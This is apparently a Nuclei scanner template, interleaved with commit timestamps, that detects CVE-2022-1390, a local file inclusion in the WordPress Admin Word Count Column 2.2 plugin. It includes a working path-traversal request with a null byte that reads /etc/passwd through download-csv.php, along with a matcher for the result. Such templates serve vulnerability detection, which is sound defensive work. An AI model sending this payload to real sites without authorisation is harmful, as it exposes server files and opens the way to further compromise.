2022-08-06 16:54:58 +00:00
id : CVE-2022-1390
2022-03-29 12:59:12 +00:00
info :
2022-08-05 13:57:51 +00:00
name : WordPress Admin Word Count Column 2.2 - Local File Inclusion
2022-03-29 12:59:12 +00:00
author : daffainfo,Splint3r7
2022-08-25 08:56:24 +00:00
severity : critical
2022-08-10 08:40:43 +00:00
description : |
The plugin does not validate the path parameter given to readfile(), which could allow unauthenticated attackers to read arbitrary files on server running old version of PHP susceptible to the null byte technique. This could also lead to RCE by using a Phar Deserialization technique.
2023-09-06 11:59:08 +00:00
remediation : |
Update to the latest version of the WordPress Admin Word Count Column plugin (2.2 or higher) to fix the local file inclusion vulnerability.
2022-04-02 10:39:39 +00:00
reference :
- https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html
- https://wordpress.org/plugins/admin-word-count-column/
2022-08-06 16:54:58 +00:00
- https://wpscan.com/vulnerability/6293b319-dc4f-4412-9d56-55744246c990
2022-08-10 08:40:43 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-1390
2022-08-05 13:57:51 +00:00
classification :
2022-08-25 08:56:24 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-08-06 16:54:58 +00:00
cve-id : CVE-2022-1390
2022-08-25 08:56:24 +00:00
cwe-id : CWE-22
2023-11-03 15:51:18 +00:00
epss-score : 0.96303
2023-11-14 14:37:18 +00:00
epss-percentile : 0.99403
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:admin_word_count_column_project:admin_word_count_column:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : admin_word_count_column_project
product : admin_word_count_column
2023-09-06 11:59:08 +00:00
framework : wordpress
2023-07-11 19:49:27 +00:00
tags : packetstorm,wpscan,cve,cve2022,wordpress,wp-plugin,lfi,wp
2022-03-29 12:59:12 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-03-29 12:59:12 +00:00
- method : GET
path :
- '{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0'
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
- type : status
status :
- 200
2023-11-14 16:39:03 +00:00
# digest: 4a0a00473045022100a9e5a44c34959fe6ea050f3faea5f3bf628eabeacd3590cc0e746dadc9b2b9c8022057e7e87670ffea1003a3ab0c71a47e2e9cbab618167a350658af8a4b89dc3d45:922c64590222798bb761d5b6d8e72950